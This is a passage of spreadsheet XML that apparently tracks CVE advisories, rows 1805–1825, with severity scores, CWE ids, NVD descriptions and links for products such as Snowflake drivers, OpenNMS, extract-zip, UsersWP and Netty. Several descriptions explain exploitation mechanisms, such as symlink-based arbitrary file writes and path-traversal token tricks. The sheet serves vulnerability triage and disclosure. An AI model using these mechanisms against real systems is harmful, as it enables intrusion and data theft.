      </c>
      <c r="G1805" s="5" t="inlineStr"/>
      <c r="H1805" s="5" t="inlineStr"/>
      <c r="I1805" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1805" s="5" t="inlineStr"/>
      <c r="K1805" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1805" s="5" t="inlineStr">
        <is>
          <t>nbviewer through 1.0.1 contains a path traversal vulnerability in LocalFileHandler.can_show() that uses string-prefix comparison instead of proper path validation. Attackers can read files from sibling directories outside the configured root by requesting paths that share the root as a textual prefix, disclosing unintended notebooks and credentials.</t>
        </is>
      </c>
      <c r="M1805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86258</t>
        </is>
      </c>
    </row>
    <row r="1806">
      <c r="A1806" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86297</t>
        </is>
      </c>
      <c r="C1806" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1806" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1806" s="5" t="inlineStr"/>
      <c r="F1806" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1806" s="5" t="inlineStr"/>
      <c r="H1806" s="5" t="inlineStr"/>
      <c r="I1806" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1806" s="5" t="inlineStr"/>
      <c r="K1806" s="5" t="inlineStr">
        <is>
          <t>CWE-189, CWE-193</t>
        </is>
      </c>
      <c r="L1806" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in D-Link DIR-605 B1v202WWB03. This issue affects the function tunnel_set_params of the file progs.gpl/pppd.alpha/l2tp/tunnel.c of the component L2TP Control Message Parser. Such manipulation of the argument peer_hostname  leads to off-by-one. The attack may be performed from remote. Attacks of this nature are highly complex. The exploitability is assessed as difficult. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="M1806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86297</t>
        </is>
      </c>
    </row>
    <row r="1807">
      <c r="A1807" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86600</t>
        </is>
      </c>
      <c r="C1807" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1807" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1807" s="5" t="inlineStr"/>
      <c r="F1807" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1807" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H1807" s="5" t="inlineStr"/>
      <c r="I1807" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1807" s="5" t="inlineStr"/>
      <c r="K1807" s="5" t="inlineStr">
        <is>
          <t>CWE-441, CWE-522</t>
        </is>
      </c>
      <c r="L1807" s="5" t="inlineStr">
        <is>
          <t>In affected Snowflake drivers, WORKLOAD_IDENTITY authentication requests a cloud workload-identity token and attaches it to the login request without verifying that the configured host is a Snowflake endpoint. An attacker who can modify the connection configuration can cause the driver to mint a fresh attestation and send it to a host they control. The captured token can be replayed to Snowflake for its remaining lifetime in accounts where that workload identity is already registered. On Azure, the token audience is also taken from connection configuration. Combined with an attacker-controlled host, the driver can request a Managed Identity access token scoped to a non-Snowflake Azure resource and deliver it to the attacker. That path is the only case in which impact extends beyond Snowflake; it is bounded by the token lifetime and the managed identity’s permissions. Successful exploitation requires WORKLOAD_IDENTITY authentication on a workload that already has an ambient cloud identity. Patched driver versions restrict this authenticator to recognized Snowflake hosts. Users must manually upgrade.</t>
        </is>
      </c>
      <c r="M1807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86600</t>
        </is>
      </c>
    </row>
    <row r="1808">
      <c r="A1808" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1808" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88032</t>
        </is>
      </c>
      <c r="C1808" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1808" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1808" s="5" t="inlineStr"/>
      <c r="F1808" s="5" t="inlineStr"/>
      <c r="G1808" s="5" t="inlineStr">
        <is>
          <t>java, mongodb</t>
        </is>
      </c>
      <c r="H1808" s="5" t="inlineStr"/>
      <c r="I1808" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1808" s="5" t="inlineStr"/>
      <c r="K1808" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1808" s="5" t="inlineStr">
        <is>
          <t>A use-after-free in the reactive client-side encryption component of the MongoDB Java Driver can cause native resources to be freed while an affected encrypted operation is still using them when the operation is cancelled. A party able to cause such an operation to be cancelled may cause the hosting application process to terminate. Reaching the issue requires an affected reactive encryption configuration that retrieves KMS credentials on demand.</t>
        </is>
      </c>
      <c r="M1808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88032</t>
        </is>
      </c>
    </row>
    <row r="1809">
      <c r="A1809" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88897</t>
        </is>
      </c>
      <c r="C1809" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1809" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1809" s="5" t="inlineStr"/>
      <c r="F1809" s="5" t="inlineStr"/>
      <c r="G1809" s="5" t="inlineStr"/>
      <c r="H1809" s="5" t="inlineStr"/>
      <c r="I1809" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1809" s="5" t="inlineStr"/>
      <c r="K1809" s="5" t="inlineStr">
        <is>
          <t>CWE-598</t>
        </is>
      </c>
      <c r="L1809" s="5" t="inlineStr">
        <is>
          <t>Flextype CMS through 1.0.0-alpha.3 accepts API authentication credentials through URL query string parameters in REST API routes. Attackers with access to web server, proxy, or monitoring logs can recover valid API token pairs that grant full API access.</t>
        </is>
      </c>
      <c r="M1809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88897</t>
        </is>
      </c>
    </row>
    <row r="1810">
      <c r="A1810" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89054</t>
        </is>
      </c>
      <c r="C1810" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1810" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1810" s="5" t="inlineStr"/>
      <c r="F1810" s="5" t="inlineStr"/>
      <c r="G1810" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H1810" s="5" t="inlineStr"/>
      <c r="I1810" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1810" s="5" t="inlineStr"/>
      <c r="K1810" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1810" s="5" t="inlineStr">
        <is>
          <t>A missing authorization vulnerability in OpenNMS Horizon allows configuration changes without authentication. The Spring Security policy for the /api/v2 REST API defines authorization rules for every HTTP method except PATCH, so the shipped @PATCH configuration endpoints for event configuration and SNMP data collection (which enable and disable event definitions and data-collection sources) are reachable with no authorization enforced. An unauthenticated attacker able to reach the web UI can disable event definitions and SNMP data collection, suppressing event and alarm generation and stopping metric collection - silently degrading monitoring and detection - with the change persisted and reloaded into the running system.
The solution is to upgrade to Horizon 36.0.4 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet.</t>
        </is>
      </c>
      <c r="M1810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89054</t>
        </is>
      </c>
    </row>
    <row r="1811">
      <c r="A1811" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1811" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-58375</t>
        </is>
      </c>
      <c r="C1811" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1811" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1811" s="5" t="inlineStr"/>
      <c r="F1811" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1811" s="5" t="inlineStr"/>
      <c r="H1811" s="5" t="inlineStr"/>
      <c r="I1811" s="5" t="inlineStr">
        <is>
          <t>2025-09-06</t>
        </is>
      </c>
      <c r="J1811" s="5" t="inlineStr"/>
      <c r="K1811" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1811" s="5" t="inlineStr">
        <is>
          <t>Frappe is a full-stack web application framework. Versions 14.96.9 and below, and 15.0.0 through 15.71.0 have an insecure endpoint parameter that is vulnerable to error-based SQL Injection through lack of validation. Sensitive information such as versioning can be retrieved. This issue is fixed in versions 14.96.10 and 15.72.0.</t>
        </is>
      </c>
      <c r="M1811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-58375</t>
        </is>
      </c>
    </row>
    <row r="1812">
      <c r="A1812" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1812" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-63822</t>
        </is>
      </c>
      <c r="C1812" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1812" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1812" s="5" t="inlineStr"/>
      <c r="F1812" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1812" s="5" t="inlineStr"/>
      <c r="H1812" s="5" t="inlineStr"/>
      <c r="I1812" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1812" s="5" t="inlineStr"/>
      <c r="K1812" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L1812" s="5" t="inlineStr">
        <is>
          <t>SirenGPS Android Application 2.19.44 is vulnerable to Incorrect Access Control. An authenticated attacker can manipulate user identifier parameters to bypass authorization controls and gain unauthorized READ and WRITE access to other users' personal information. The API fails to validate that the requesting user is authorized to access the target user's data.</t>
        </is>
      </c>
      <c r="M1812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-63822</t>
        </is>
      </c>
    </row>
    <row r="1813">
      <c r="A1813" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1813" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-9566</t>
        </is>
      </c>
      <c r="C1813" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1813" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1813" s="5" t="inlineStr"/>
      <c r="F1813" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1813" s="5" t="inlineStr"/>
      <c r="H1813" s="5" t="inlineStr"/>
      <c r="I1813" s="5" t="inlineStr">
        <is>
          <t>2025-09-05</t>
        </is>
      </c>
      <c r="J1813" s="5" t="inlineStr"/>
      <c r="K1813" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1813" s="5" t="inlineStr">
        <is>
          <t>There's a vulnerability in podman where an attacker may use the kube play command to overwrite host files when the kube file container a Secrete or a ConfigMap volume mount and such volume contains a symbolic link to a host file path. In a successful attack, the attacker can only control the target file to be overwritten but not the content to be written into the file.
Binary-Affected: podman
Upstream-version-introduced: v4.0.0
Upstream-version-fixed: v5.6.1</t>
        </is>
      </c>
      <c r="M1813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-9566</t>
        </is>
      </c>
    </row>
    <row r="1814">
      <c r="A1814" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1814" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18147</t>
        </is>
      </c>
      <c r="C1814" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1814" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1814" s="5" t="inlineStr"/>
      <c r="F1814" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1814" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1814" s="5" t="inlineStr"/>
      <c r="I1814" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1814" s="5" t="inlineStr"/>
      <c r="K1814" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1814" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in FreeIPA. An unauthenticated remote attacker could exploit a DOM Cross-Site Scripting (XSS) vulnerability in the FreeIPA/IdM Web UI password reset page. By enticing a victim to click a specially crafted link and complete a password reset, the attacker could inject and execute arbitrary JavaScript code. This allows the attacker to perform actions within the victim's authenticated session, potentially leading to full administrative control if an IdM administrator is targeted.</t>
        </is>
      </c>
      <c r="M1814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18147</t>
        </is>
      </c>
    </row>
    <row r="1815">
      <c r="A1815" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1815" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19219</t>
        </is>
      </c>
      <c r="C1815" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1815" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1815" s="5" t="inlineStr"/>
      <c r="F1815" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1815" s="5" t="inlineStr"/>
      <c r="H1815" s="5" t="inlineStr"/>
      <c r="I1815" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1815" s="5" t="inlineStr"/>
      <c r="K1815" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-434</t>
        </is>
      </c>
      <c r="L1815" s="5" t="inlineStr">
        <is>
          <t>In Progress® Telerik® UI for AJAX prior to v2026.3.812, insufficient integrity protection of dialog request parameters used by the RadEditor file browser may allow an attacker who has obtained certain application encryption key material to alter the folders the file browser reads from, writes to, and uploads into, potentially resulting in remote code execution.</t>
        </is>
      </c>
      <c r="M1815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19219</t>
        </is>
      </c>
    </row>
    <row r="1816">
      <c r="A1816" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1816" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19303</t>
        </is>
      </c>
      <c r="C1816" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1816" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1816" s="5" t="inlineStr"/>
      <c r="F1816" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1816" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H1816" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1816" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1816" s="5" t="inlineStr"/>
      <c r="K1816" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1816" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote authenticated attacker to delete arbitrary local files or directories due to improper limitation of a pathname to a restricted directory.</t>
        </is>
      </c>
      <c r="M1816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19303</t>
        </is>
      </c>
    </row>
    <row r="1817">
      <c r="A1817" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1817" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19594</t>
        </is>
      </c>
      <c r="C1817" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1817" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1817" s="5" t="inlineStr"/>
      <c r="F1817" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1817" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1817" s="5" t="inlineStr"/>
      <c r="I1817" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1817" s="5" t="inlineStr"/>
      <c r="K1817" s="5" t="inlineStr">
        <is>
          <t>CWE-141, CWE-22</t>
        </is>
      </c>
      <c r="L1817" s="5" t="inlineStr">
        <is>
          <t>Insufficient input sanitization in Snowflake Python API (`snowflake.core`) versions prior to 1.13.0 allowed confused-deputy privilege escalation through two related weaknesses: path traversal (CWE-22) via unencoded `..` identifier path segments, and HTTP parameter pollution (CWE-141) via unencoded `&amp;`/`#`/`=` characters in query string values. An attacker with access to a downstream application built on snowflake.core could exploit the path traversal by supplying `..` as an object name, causing `snowflake.core` to issue REST requests against a parent resource or exploit the parameter pollution by injecting `&amp;`/`#`/`=` into a free-form name field to override constraints on swap, clone, or rename operations — all executed under the application's privileged session. Successful exploitation requires the attacker to control an identifier or object-name string in an application built on snowflake.core that passes it to `snowflake.core` under a higher-privileged Snowflake session (e.g., an EXECUTE AS OWNER stored procedure, Streamlit app, or Native App). The fix is available in Snowflake Python API version 1.13.0, which also addresses several additional security findings. Users must manually upgrade.</t>
        </is>
      </c>
      <c r="M1817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19594</t>
        </is>
      </c>
    </row>
    <row r="1818">
      <c r="A1818" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1818" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19693</t>
        </is>
      </c>
      <c r="C1818" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1818" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1818" s="5" t="inlineStr"/>
      <c r="F1818" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1818" s="5" t="inlineStr"/>
      <c r="H1818" s="5" t="inlineStr"/>
      <c r="I1818" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1818" s="5" t="inlineStr"/>
      <c r="K1818" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="L1818" s="5" t="inlineStr">
        <is>
          <t>extract-zip through 2.0.1 containment-checks only the parent directory of each archive entry and never the entry's own final path component, so an archive containing two entries with identical names - a symlink whose target is outside the destination, followed by a regular file - writes through the planted symlink and yields an arbitrary file write outside the destination directory.</t>
        </is>
      </c>
      <c r="M1818" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19693</t>
        </is>
      </c>
    </row>
    <row r="1819">
      <c r="A1819" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1819" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19991</t>
        </is>
      </c>
      <c r="C1819" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1819" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1819" s="5" t="inlineStr"/>
      <c r="F1819" s="5" t="inlineStr"/>
      <c r="G1819" s="5" t="inlineStr"/>
      <c r="H1819" s="5" t="inlineStr"/>
      <c r="I1819" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1819" s="5" t="inlineStr"/>
      <c r="K1819" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1819" s="5" t="inlineStr">
        <is>
          <t>The UsersWP plugin for WordPress is vulnerable to Arbitrary File Deletion in versions up to, and including, 1.2.70 via the upload_file_remove() AJAX handler. The plugin stores the value of an account 'file' form field taken directly from $_POST when no real $_FILES upload is provided (process_account() calls uwp_validate_fields() and array_merges the result with the empty output of UsersWP_Files::validate_uploads()). At storage time the value is only checked with validate_file(), which passes any string that does not contain a literal '../'. When the value is later processed by upload_file_remove(), it is again gated with validate_file() and then normalized through uwp_get_file_relative_url(); that helper performs a global str_replace() of the uploads base URL against the stored URL, allowing a crafted URL containing embedded '..&lt;uploads-baseurl&gt;' tokens to collapse into '../../' traversal sequences after the last validation. The transformed value is then appended to the uploads base directory and passed to wp_delete_file() without any canonical containment check. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the affected site's server (including wp-config.</t>
        </is>
      </c>
      <c r="M1819" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19991</t>
        </is>
      </c>
    </row>
    <row r="1820">
      <c r="A1820" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1820" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32257</t>
        </is>
      </c>
      <c r="C1820" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1820" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1820" s="5" t="inlineStr"/>
      <c r="F1820" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1820" s="5" t="inlineStr"/>
      <c r="H1820" s="5" t="inlineStr"/>
      <c r="I1820" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1820" s="5" t="inlineStr"/>
      <c r="K1820" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1820" s="5" t="inlineStr">
        <is>
          <t>Winter is a free, open-source content management system (CMS) based on the Laravel PHP framework. Prior to 1.2.13, custom CSS supplied through the Brand Settings Styles field by a backend user with the backend.manage_branding permission is compiled by the LESS parser and rendered without sanitization on every backend page, allowing stored cross-site scripting against backend users. This issue is fixed in version 1.2.13.</t>
        </is>
      </c>
      <c r="M1820" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32257</t>
        </is>
      </c>
    </row>
    <row r="1821">
      <c r="A1821" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1821" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32258</t>
        </is>
      </c>
      <c r="C1821" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1821" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1821" s="5" t="inlineStr"/>
      <c r="F1821" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1821" s="5" t="inlineStr"/>
      <c r="H1821" s="5" t="inlineStr"/>
      <c r="I1821" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1821" s="5" t="inlineStr"/>
      <c r="K1821" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1821" s="5" t="inlineStr">
        <is>
          <t>Winter is a free, open-source content management system (CMS) based on the Laravel PHP framework. From 1.2.10 through 1.2.12, authenticated backend users with the backend.manage_editor permission can store custom Markup Styles that are compiled by the LESS parser and rendered without sanitization on every backend page, allowing stored cross-site scripting. This issue is fixed in version 1.2.13.</t>
        </is>
      </c>
      <c r="M1821" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32258</t>
        </is>
      </c>
    </row>
    <row r="1822">
      <c r="A1822" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1822" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33997</t>
        </is>
      </c>
      <c r="C1822" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1822" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1822" s="5" t="inlineStr"/>
      <c r="F1822" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1822" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1822" s="5" t="inlineStr">
        <is>
          <t>docker:engine</t>
        </is>
      </c>
      <c r="I1822" s="5" t="inlineStr">
        <is>
          <t>2026-03-31</t>
        </is>
      </c>
      <c r="J1822" s="5" t="inlineStr"/>
      <c r="K1822" s="5" t="inlineStr">
        <is>
          <t>CWE-193, CWE-266</t>
        </is>
      </c>
      <c r="L1822" s="5" t="inlineStr">
        <is>
          <t>Moby is an open source container framework. Prior to version 29.3.1, a security vulnerability has been detected that allows plugins privilege validation to be bypassed during docker plugin install. Due to an error in the daemon's privilege comparison logic, the daemon may incorrectly accept a privilege set that differs from the one approved by the user. Plugins that request exactly one privilege are also affected, because no comparison is performed at all. This issue has been patched in version 29.3.1.</t>
        </is>
      </c>
      <c r="M1822" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33997</t>
        </is>
      </c>
    </row>
    <row r="1823">
      <c r="A1823" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1823" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44249</t>
        </is>
      </c>
      <c r="C1823" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1823" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1823" s="5" t="inlineStr"/>
      <c r="F1823" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1823" s="5" t="inlineStr"/>
      <c r="H1823" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I1823" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J1823" s="5" t="inlineStr"/>
      <c r="K1823" s="5" t="inlineStr">
        <is>
          <t>CWE-1287, CWE-284, CWE-697</t>
        </is>
      </c>
      <c r="L1823" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. In netty-handler prior to versions 4.1.135.Final and 4.2.15.Final, an attacker can bypass IPv6 subnet rules due to an incorrect masking operation in IpSubnetFilterRule.compareTo(). Valid public IP addresses can bypass the restrictions. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M1823" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44249</t>
        </is>
      </c>
    </row>
    <row r="1824">
      <c r="A1824" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1824" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44745</t>
        </is>
      </c>
      <c r="C1824" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1824" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1824" s="5" t="inlineStr"/>
      <c r="F1824" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1824" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H1824" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I1824" s="5" t="inlineStr">
        <is>
          <t>2026-07-14</t>
        </is>
      </c>
      <c r="J1824" s="5" t="inlineStr"/>
      <c r="K1824" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L1824" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not properly validate incoming request headers during the OAuth2 login flow under certain configurations. This allows an unauthenticated remote attacker to craft a malicious link which, when clicked by a victim, could lead to unauthorized access. Successful exploitation results in a high impact to the confidentiality and integrity with no impact on the availability of the application.</t>
        </is>
      </c>
      <c r="M1824" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44745</t>
        </is>
      </c>
    </row>
    <row r="1825">
      <c r="A1825" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1825" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4600</t>
        </is>
      </c>
      <c r="C1825" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1825" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1825" s="5" t="inlineStr"/>
      <c r="F1825" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1825" s="5" t="inlineStr"/>
      <c r="H1825" s="5" t="inlineStr">
        <is>
          <t>kjur:jsrsasign</t>
        </is>
      </c>
      <c r="I1825" s="5" t="inlineStr">
        <is>
          <t>2026-03-23</t>
